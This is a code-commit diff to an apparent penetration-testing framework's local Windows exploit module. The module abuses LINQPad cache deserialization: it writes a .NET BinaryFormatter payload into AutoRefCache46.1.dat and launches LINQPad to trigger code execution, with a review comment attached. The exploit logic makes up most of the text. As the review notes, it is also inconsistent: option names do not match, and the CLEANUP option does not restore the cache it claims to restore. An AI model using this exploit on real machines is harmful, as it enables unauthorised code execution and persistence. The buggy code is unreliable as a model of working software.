
Commit 2f351ea

committed
Addressing some issues
1 parent 93c2360 commit 2f351ea


2 files changed

+13
-93
lines changed


modules/exploits/windows/local/linqpad_deserialization.rb

Lines changed: 0 additions & 85 deletions
This file was deleted.

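--- a/modules/exploits/windows/local/linqpad_deserialization_persistence.rb
+++ b/modules/exploits/windows/local/linqpad_deserialization_persistence.rb
@@ -48,21 +48,22 @@ def initialize(info = {})
 )
 )
 register_options([
-OptString.new('LINQPad_path', [true, "Path to LINQPad executable on target's machine", "C:\Users\ms\AppData\Local\LINQPad"]),
-OptString.new('Cache_path', [true, 'Path to cache file directory containing deserialized data'])
+OptString.new('LINQPAD_FILE', [true, 'Path to LINQPad executable on target\'s machine']),
+OptString.new('CACHE_PATH', [true, 'Path to cache file directory containing deserialized data']),
+OptBool.new('CLEANUP', [false, 'Restore original cache file when exploit finish'])
 ])
 end
 
 # Simplify pulling the writable directory variable
 
 def check
-if datastore['LINQPad_path'].blank? || !file?(datastore['LINQPad_path'])
+if datastore['LINQPAD_PATH'].blank? || !file?(datastore['LINQPAD_PATH'])
 return Exploit::CheckCode::Unknown('LINQPad binary not specified or doesn\'t exist')
-elsif datastore['Cache_path'].blank? || !directory?(datastore['Cache_path']) || !file?(datastore['cache_path'] + '/autorefcache46.1.dat')
+elsif datastore['CACHE_PATH'].blank? || !directory?(datastore['Cache_path']) || !file?(datastore['CACHE_PATH'] + '/autorefcache46.1.dat')
 return Exploit::CheckCode::Unknown('Cache directory doesn\'t exist')
-elsif !file?(datastore['cache_path'] + '/autorefcache46.1.dat')
+elsif !file?(datastore['CACHE_PATH'] + '/autorefcache46.1.dat')
 return Exploit::CheckCode::Unknown('Cannot find cache file')
-elsif file?(datastore['cache_path'] + '/autorefcache46.2.dat')
+elsif file?(datastore['CACHE_PATH'] + '/autorefcache46.2.dat')
 return Exploit::CheckCode::Safe('Contains not vulnerable version of LINQPad')
 else
 return Exploit::CheckCode::Vulnerable('LINPad and vulnerable cache file present, target possibly exploitable')
@@ -77,9 +78,13 @@ def exploit
 formatter: :BinaryFormatter
 )
 # try to overwrite cache file
-fail_with(Failure::PayloadFailed, 'Writing payload to cache file failed') unless write_file(datastore['Cache_path'] + '/AutoRefCache46.1.dat', dotnet_payload)
+fail_with(Failure::PayloadFailed, 'Writing payload to cache file failed') unless write_file(datastore['CACHE_PATH'] + '/AutoRefCache46.1.dat', dotnet_payload)
 
 # run LINQPad and trigger deserialization
-fail_with(Failure::PayloadFailed, 'Running LINQPad failed') unless cmd_exec(datastore['LINQPad_path'])
+fail_with(Failure::PayloadFailed, 'Running LINQPad failed') unless cmd_exec(datastore['LINQPAD_PATH'])
+
+# add cleanup option
+register_file_for_cleanup(datastore['CACHE_PATH']) if datastore['CLEANUP']
+
 end
 end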
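Review bot: The option is registered as `LINQPAD_FILE` in `register_options`, but the new lines in `check` and `exploit` read `datastore['LINQPAD_PATH']`, a name that no option visible here defines, so the required value the operator sets is not the one these lines test or run. Use one name in all three places, for example `OptString.new('LINQPAD_PATH', ...)`. The `CLEANUP` description promises to restore the original cache file, yet `register_file_for_cleanup(datastore['CACHE_PATH'])` is given the cache directory and nothing visible saves the original `AutoRefCache46.1.dat`, so the host's cache is left overwritten rather than restored. Either keep the original contents before `write_file` and write them back, or reword the option to say what it actually does. The new `check` line also keeps the old spelling in `directory?(datastore['Cache_path'])`. The body of `exploit` starts before its hunk and the body of `check` ends after its hunk.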
